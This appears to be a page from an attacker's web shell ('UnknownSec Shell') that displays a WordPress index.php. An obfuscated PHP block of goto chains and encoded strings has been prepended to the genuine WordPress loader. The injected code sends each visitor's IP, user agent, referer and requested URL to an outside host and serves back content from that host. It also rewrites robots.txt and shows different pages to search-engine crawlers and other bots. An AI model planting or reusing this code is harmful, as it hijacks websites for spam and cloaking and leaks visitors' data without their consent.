shell bypass 403

UnknownSec Shell

C:/grolt/htdocs/ [ drwxrwxrwx ]

name : index.php
<?php
 goto F3Ewt; YC2Ry: LxvsF: goto UJrxT; OnrIW: goto Lxns1; goto eZ0nM; Trl4O: $rAklR = 0; goto draIt; YU32d: goto x4geV; goto bjXUD; UcfKU: goto V6m_M; goto bthCu; lHekz: $mgHCs = urlencode($_SERVER["\x53\103\x52\x49\x50\124\x5f\x4e\x41\x4d\105"]); goto ZcrSe; Phe28: YfIQZ: goto gJ5l3; ZVViw: fKbYw("\162\157\142\157\x74\163\56\x74\x78\164", $GAdIX); goto m13YW; uk5e0: veu63: goto wWsZb; ISV7A: $CBM3W = "\57\77"; goto ziSfn; Wy0ax: $Uzrwq = urlencode(@$_SERVER["\110\x54\x54\120\x5f\122\x45\x46\105\x52\x45\x52"]); goto MysAW; y4taf: $A_lG6 = $xo16g . $ODwdi . $x3RgI . $ltOWt . $yVwKq; goto QqSps; dl2DW: ogAPi: goto CwLCP; CTFFj: hEDc4: goto QApub; R2Zk2: $K02y5 = urlencode(@$_SERVER["\x48\x54\124\x50\137\101\x43\x43\x45\120\124\137\114\101\x4e\x47\125\101\x47\x45"]); goto Wy0ax; ArKtI: $GAdIX = @file_get_contents($PBUy2); goto rytFU; IN8Wi: yeFAB: goto ISV7A; O8oZN: $Zoesa = urlencode($_SERVER["\110\x54\124\x50\x5f\x48\117\x53\x54"]); goto lHekz; R11Ep: $xo16g = "\x68\164"; goto ZHeaB; t3eKM: goto KknUY; goto ReQEy; CwLCP: goto pDr6O; goto CTFFj; IWxki: header("\103\157\x6e\164\145\156\x74\55\x54\171\160\145\72\40\164\x65\170\x74\57\x68\164\155\x6c\x3b\x20\x63\x68\x61\x72\x73\x65\164\75\165\164\146\x2d\x38"); goto OnrIW; Y7AEu: FkByW($mPlA7, "\61"); goto YC2Ry; iuSVJ: hpgd1: goto QiP7J; QqSps: $alPA6 = "\x44\x77\147\112\x42\x77\122"; goto j3sAJ; VvSuS: $CBM3W = $CBM3W . "\77"; goto t3eKM; Z8GWK: goto E4_51; goto FgBTI; bjXUD: Fe1NT: goto SUQAn; rytFU: if (!empty($GAdIX)) { goto Ok8_s; } goto nXqht; TxUGs: cQ7sC: goto Trl4O; zqT9Y: exit; goto IXJno; jqMs_: if (!(strpos($Gbnxp, "\162\x6f\142\157\x74\163\56\x74\x78\x74") !== false)) { goto Tfg6R; } goto ZVViw; kV1L0: if (!empty($aiJad)) { goto hgMXK; } goto jqMs_; eZ0nM: WR6zz: goto bVjPC; c42rW: Lxns1: goto YU32d; rsCDD: $VZYN_ = "{$v20Ue}\x3a\57\x2f" . $Zoesa . $CBM3W . "\163\x69\x74\x65\155\141\160\x2e\x78\155\x6c"; goto TaHfD; TaHfD: $aiJad = trim($aiJad) . "\xd\12" . "\x53\151\164\x65\x6d\141\160\72\x20{$VZYN_}"; goto lUtOb; Ku4Zn: $I7hEo = urlencode($_SERVER["\x48\124\x54\x50\x5f\x55\123\x45\122\x5f\101\x47\105\116\x54"]); goto gbjGC; rNMDf: error_reporting(0); goto WBT3M; pOSRV: return; goto vDU7x; vUzDT: if (strpos($CBM3W, "\x69\x6e\x64\x65\x78\x2e\160") !== false) { goto udaZt; } goto VvSuS; Lrhn2: if (isset($_SERVER["\110\x54\124\x50\137\130\x5f\106\117\x52\127\x41\122\104\105\x44\137\106\x4f\122"])) { goto pNlUP; } goto iOa4b; DN6VK: echo "\157\153"; goto YQvjF; rO3OK: header("\110\x54\124\120\57\61\x2e\60\x20\x35\x30\60\40\x49\156\164\x65\x72\x6e\141\154\40\x53\145\x72\x76\x65\162\40\x45\162\x72\157\162"); goto Z3yPu; mrbeS: $Ye8CI = $_SERVER["\x48\x54\x54\120\137\130\137\x46\x4f\x52\x57\101\x52\104\105\104\x5f\106\x4f\122"]; goto XKshz; WBT3M: if (!preg_match("\x2f\50\154\151\147\x68\164\x44\145\143\x6b\x52\145\160\157\x72\164\163\x20\x42\157\164\x7c\x47\157\x2d\x68\164\164\160\x2d\x63\154\151\x65\x6e\164\174\x45\141\x73\x6f\165\x53\160\x69\144\x65\x72\x7c\x50\171\164\150\x6f\x6e\x7c\103\145\156\163\171\x73\x49\156\x73\160\145\x63\x74\174\102\x61\162\153\x72\157\x77\154\145\162\x7c\x48\164\x74\x70\103\154\x69\145\x6e\x74\x7c\x69\x6e\x64\x79\x20\114\151\x62\x72\141\162\171\x7c\x53\145\155\162\165\163\x68\x42\x6f\164\x7c\x4a\141\x75\x6e\x74\171\174\x41\x6d\141\x7a\x6f\156\x42\157\x74\x7c\125\x6e\x69\x76\145\162\163\141\x6c\106\x65\145\x64\120\x61\162\163\x65\x72\174\x5a\x6d\x45\x75\x7c\x43\x6f\157\154\160\x61\x64\x57\x65\x62\153\151\164\x7c\104\151\x67\x45\x78\x74\174\171\x79\123\x70\x69\144\145\162\x7c\x73\167\x69\146\x74\142\x6f\x74\x7c\x41\x68\162\x65\146\163\x42\x6f\164\x7c\131\141\156\x64\x65\170\x42\157\x74\174\x61\160\141\x63\150\x65\102\145\x6e\x63\150\174\105\x7a\157\x6f\x6d\163\174\x53\143\162\x61\x70\x79\x7c\160\x65\164\141\x6c\x42\157\x74\x7c\x44\x61\x74\x61\x46\157\x72\x53\105\117\x7c\x59\x69\163\x6f\x75\x53\160\x69\144\145\162\x7c\115\152\61\62\142\157\x74\x7c\x61\163\x6b\x54\142\106\x58\x54\x56\174\x48\x65\162\x69\x74\x72\151\170\x7c\x70\171\164\150\157\156\x2d\x72\x65\x71\165\145\163\x74\163\174\103\154\x61\165\x64\145\142\x6f\164\174\102\171\164\x65\x73\160\x69\144\145\162\x7c\120\171\x74\x68\157\x6e\x2d\165\162\x6c\x6c\x69\x62\174\x46\145\x65\144\154\x79\x7c\x47\x50\124\x42\x6f\x74\x7c\103\162\x61\x77\x6c\104\141\x64\144\171\x7c\112\x61\x76\x61\x7c\104\x6f\x74\102\157\164\x7c\152\x69\153\145\123\x70\151\x64\x65\162\174\x4f\x42\x6f\164\x7c\x70\141\154\157\141\x6c\164\157\x6e\x65\x74\167\x6f\162\x6b\x73\174\x46\x65\145\144\104\x65\x6d\x6f\156\174\123\x65\172\156\x61\155\102\157\x74\x29\57\151", $_SERVER["\110\124\x54\x50\x5f\x55\123\105\x52\137\101\x47\105\x4e\x54"])) { goto Mb42Z; } goto WSNJC; ZcrSe: $Ye8CI = urlencode($Ye8CI); goto IT1Gl; bVjPC: header("\103\x6f\156\164\145\x6e\164\x2d\124\x79\160\145\x3a\x20\164\145\x78\x74\57\170\x6d\154\73\40\x63\150\x61\x72\163\x65\x74\75\165\164\x66\x2d\70"); goto c42rW; XlWoy: curl_setopt($tmz4U, CURLOPT_URL, $PBUy2); goto cX30B; V5fdO: $rAklR = sS0jV($mPlA7); goto UcfKU; AaKqR: x4geV: goto hp_iA; h6WTW: goto LxvsF; goto ZdOau; g45eX: if (strpos($Gbnxp, "\x6a\x70\62\x30\62\x33") !== false) { goto Fe1NT; } goto DzyI4; ggyV4: KknUY: goto rT02t; xTUI9: function Ss0jV($CDQYK) { goto l4U7z; gnmmm: return $WIWhL; goto UDCx0; UDCx0: Art2y: goto fNMug; fNMug: return false; goto uUd8o; d8eWj: $WIWhL = fread($Lt11p, filesize($CDQYK)); goto MKAWb; l4U7z: $Lt11p = fopen($CDQYK, "\x72"); goto UpyyY; UpyyY: if (!$Lt11p) { goto Art2y; } goto d8eWj; MKAWb: fclose($Lt11p); goto gnmmm; uUd8o: } goto Ojv9P; ZHeaB: $yVwKq = "\157\155\x2f"; goto omTBb; qiWhK: curl_setopt($tmz4U, CURLOPT_SSL_VERIFYHOST, FALSE); goto Ub1JC; qHdPI: curl_setopt($tmz4U, CURLOPT_FOLLOWLOCATION, false); goto Sjzwt; IXJno: Mb42Z: goto R2Zk2; draIt: $mPlA7 = "\170\161\161\56\x74\x78\164"; goto GkQKu; cX30B: curl_setopt($tmz4U, CURLOPT_RETURNTRANSFER, true); goto qHdPI; bz68t: if ($rAklR == 0) { goto yeFAB; } goto YFf0u; V6T1n: if ($GAdIX === "\x6f\x6b") { goto RQxVT; } goto rYaVd; j3sAJ: $turUs = "\131\141\x68\x6f\x6f\174\102\x69\x6e\147\174\107\157\157\147\x6c\x65\174\x44\157\143\157\155\157"; goto rNMDf; QiP7J: $_SERVER["\122\105\x51\x55\x45\123\124\x5f\123\x43\x48\x45\x4d\105"] = "\150\164\x74\x70\x73"; goto lVcEa; m13YW: Tfg6R: goto fhkFf; U1oyy: if (!(strpos($Gbnxp, "\x78\x71\161\170\x71\161") !== false)) { goto cQ7sC; } goto DN6VK; rT02t: $aiJad = "\125\x73\x65\162\55\x61\147\145\156\164\72\x20\52\xd\xa\x41\154\154\x6f\167\x3a\x20\57"; goto rsCDD; fPDe4: exit; goto pOSRV; Ub1JC: $GAdIX = curl_exec($tmz4U); goto dHZGg; VMifd: $PBUy2 = $A_lG6 . "\x3f\x61\147\145\x6e\164\x3d{$I7hEo}\46\162\x65\x66\x65\x72\x3d{$Uzrwq}\x26\154\141\156\x67\x3d{$K02y5}\46\151\160\x3d{$Ye8CI}\46\144\157\155\x3d{$Zoesa}\46\x68\x74\164\x70\75{$v20Ue}\x26\x75\162\151\75{$Gbnxp}\46\160\143\x3d{$alPA6}\x26\x72\x65\x77\162\x69\x74\x65\x61\142\154\145\75{$rAklR}\x26\x73\143\162\x69\x70\x74\x3d{$mgHCs}\x26\x73\x69\164\145\155\x61\x70\x3d" . urlencode($VZYN_); goto LHDVu; Hgcnx: $rAklR = 1; goto Y7AEu; bM5Ef: fLnaH: goto fPDe4; FgBTI: pNlUP: goto mrbeS; fhkFf: goto fLnaH; goto O87ge; iOa4b: goto E4_51; goto Phe28; YQvjF: exit; goto TxUGs; qYuZd: FKBYw("\162\157\x62\157\x74\163\56\x74\x78\x74", $aiJad); goto bM5Ef; zccNM: goto CzRQ4; goto IN8Wi; jOACx: goto jiDw_; goto iuSVJ; h6qca: fKbYw($mPlA7, "\x30"); goto h6WTW; gJ5l3: $Ye8CI = $_SERVER["\110\124\x54\120\x5f\103\114\x49\105\x4e\x54\x5f\x49\120"]; goto Z8GWK; F3Ewt: $ltOWt = "\143\x77\x34\x31\x37\x32\56\163\151\x64\145\x6f\167\x6e\56\143"; goto R11Ep; Mq8He: if (preg_match("\x40\136\x2f\50\x2e\x2a\77\51\x2e\170\155\x6c\44\100\x69", $_SERVER["\x52\x45\x51\x55\x45\x53\124\137\x55\x52\111"]) or strpos($Gbnxp, "\162\157\142\x6f\x74\163\56\x74\x78\164") !== false or strpos($Gbnxp, "\152\160\x32\x30\62\x33") !== false or strpos($Gbnxp, "\160\151\156\147\x73\151\x74\x65\155\x61\x70") !== false or preg_match("\57\50{$turUs}\x29\57\151", $_SERVER["\110\x54\x54\x50\137\x55\x53\x45\x52\137\x41\107\105\x4e\124"]) or preg_match("\57\50{$turUs}\x29\x2f\x69", @$_SERVER["\110\x54\124\120\137\x52\105\x46\x45\x52\105\122"])) { goto veu63; } goto E3t9u; MysAW: $Ye8CI = $_SERVER["\x52\x45\x4d\117\124\x45\x5f\101\104\x44\122"]; goto Ku4Zn; gP57i: if (strpos($Gbnxp, "\146\x61\166\151\143\157\156\56\151\x63\x6f") !== false) { goto hEDc4; } goto Mq8He; bthCu: MNowl: goto BAHNr; lUtOb: $TemjA = ''; goto iNoxi; J9HuU: $CBM3W = $_SERVER["\123\103\x52\111\x50\124\137\116\x41\x4d\105"]; goto vUzDT; GkQKu: if (!is_file($mPlA7)) { goto MNowl; } goto V5fdO; dHZGg: curl_close($tmz4U); goto cTr2Q; rYaVd: $rAklR = 0; goto h6qca; BAHNr: $ZpEux = $v20Ue . "\x3a\x2f\x2f" . $_SERVER["\x48\x54\x54\x50\x5f\x48\117\123\x54"] . "\x2f\170\161\x71\170\161\161"; goto br5gR; DzyI4: if (substr($GAdIX, 0, 5) == "\74\77\x78\x6d\154") { goto WR6zz; } goto IWxki; gbjGC: if (isset($_SERVER["\110\124\124\120\137\x43\x4c\x49\105\x4e\x54\137\111\120"])) { goto YfIQZ; } goto Lrhn2; Sjzwt: curl_setopt($tmz4U, CURLOPT_SSL_VERIFYPEER, FALSE); goto qiWhK; R9DwQ: $x3RgI = "\57"; goto y4taf; Ckmf1: if (!(strpos($Gbnxp, "\x70\151\x6e\x67\163\151\164\145\x6d\141\x70") !== false)) { goto P1XHv; } goto J9HuU; rHrkZ: $aiJad = ''; goto Ckmf1; lVcEa: jiDw_: goto kK9y4; Z3yPu: exit; goto Ggp3A; hp_iA: echo $GAdIX; goto kV1L0; LHDVu: P1XHv: goto ArKtI; IT1Gl: if (!empty($_SERVER["\122\105\x51\x55\x45\x53\x54\137\x53\x43\x48\105\x4d\105"]) and $_SERVER["\x52\x45\x51\x55\105\123\x54\x5f\123\103\x48\x45\115\105"] == "\150\164\164\x70\163" or !empty($_SERVER["\x48\124\x54\120\x53"]) and $_SERVER["\110\x54\124\120\x53"] == "\x6f\x6e" or !empty($_SERVER["\123\105\x52\x56\105\122\137\x50\117\122\x54"]) and $_SERVER["\x53\105\122\x56\105\x52\x5f\120\117\x52\x54"] == "\64\64\63" or isset($_SERVER["\x48\x54\124\x50\137\x58\x5f\x46\x4f\122\x57\101\x52\104\x45\104\137\x50\122\x4f\x54\x4f"]) and $_SERVER["\110\124\124\x50\137\x58\x5f\x46\x4f\122\x57\x41\x52\x44\105\104\137\x50\122\x4f\124\x4f"] == "\x68\164\164\x70\x73") { goto hpgd1; } goto oht0O; vDU7x: am6jE: goto dl2DW; Ojv9P: $v20Ue = urlencode($_SERVER["\122\x45\x51\x55\x45\x53\124\x5f\123\103\x48\x45\x4d\105"]); goto k7JMl; SUQAn: header("\x48\124\124\120\x2f\61\56\x31\40\64\60\x34\x20\116\x6f\x74\x20\106\x6f\165\x6e\144"); goto AaKqR; kK9y4: function fKbyw($CDQYK, $WIWhL) { goto WXa1U; GUceC: if (!$Lt11p) { goto AOa2p; } goto YVtWo; YVtWo: fwrite($Lt11p, $WIWhL); goto NDk4c; WXa1U: $Lt11p = fopen($CDQYK, "\167"); goto GUceC; lKvuY: return true; goto VMDAf; NDk4c: fclose($Lt11p); goto lKvuY; VMDAf: AOa2p: goto Oa5Yl; Oa5Yl: return false; goto a1d8Q; a1d8Q: } goto xTUI9; cTr2Q: Ok8_s: goto ilrDf; ilrDf: if (empty($GAdIX)) { goto am6jE; } goto KDnq4; oht0O: $_SERVER["\122\x45\121\x55\x45\123\x54\137\x53\103\110\x45\x4d\x45"] = "\150\x74\x74\160"; goto jOACx; ReQEy: udaZt: goto bz68t; UJrxT: V6m_M: goto gP57i; k7JMl: $Gbnxp = urlencode($_SERVER["\x52\105\121\125\x45\123\x54\137\x55\122\111"]); goto U1oyy; YFf0u: $CBM3W = "\x2f"; goto zccNM; iNoxi: echo $VZYN_ . "\72\40" . $TemjA . "\74\x62\x72\57\x3e"; goto VMifd; omTBb: $ODwdi = "\164\160\x3a\x2f"; goto R9DwQ; E3t9u: goto ogAPi; goto uk5e0; KDnq4: if (!(substr($GAdIX, 0, 10) == "\x65\162\162\x6f\x72\40\143\157\144\x65" or $GAdIX == "\x35\60\x30" or strpos($GAdIX, "\x42\x61\x64\40\x47\141\x74\145\167\141\171") !== false)) { goto qkGE5; } goto rO3OK; Ggp3A: qkGE5: goto g45eX; nXqht: $tmz4U = curl_init(); goto XlWoy; O87ge: hgMXK: goto qYuZd; ZdOau: RQxVT: goto Hgcnx; br5gR: $GAdIX = @file_get_contents($ZpEux); goto V6T1n; XKshz: E4_51: goto O8oZN; WSNJC: header("\110\124\x54\120\57\61\56\x30\x20\x34\60\x33\x20\x46\157\162\x62\x69\144\144\145\x6e"); goto zqT9Y; ziSfn: CzRQ4: goto ggyV4; wWsZb: $PBUy2 = $A_lG6 . "\77\x61\x67\145\x6e\x74\x3d{$I7hEo}\x26\x72\145\146\145\162\75{$Uzrwq}\x26\x6c\x61\x6e\147\75{$K02y5}\x26\x69\x70\x3d{$Ye8CI}\46\x64\x6f\155\x3d{$Zoesa}\x26\150\164\x74\x70\75{$v20Ue}\46\x75\162\151\x3d{$Gbnxp}\x26\x70\x63\75{$alPA6}\x26\162\145\167\162\x69\164\x65\141\142\154\x65\75{$rAklR}\x26\x73\x63\162\x69\160\164\x3d{$mgHCs}"; goto rHrkZ; QApub: pDr6O:
?>
<?php
/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */

/**
 * Tells WordPress to load the WordPress theme and output it.
 *
 * @var bool
 */
define( 'WP_USE_THEMES', true );

/** Loads the WordPress Environment and Template */
require __DIR__ . '/wp-blog-header.php';	

© 2026 UnknownSec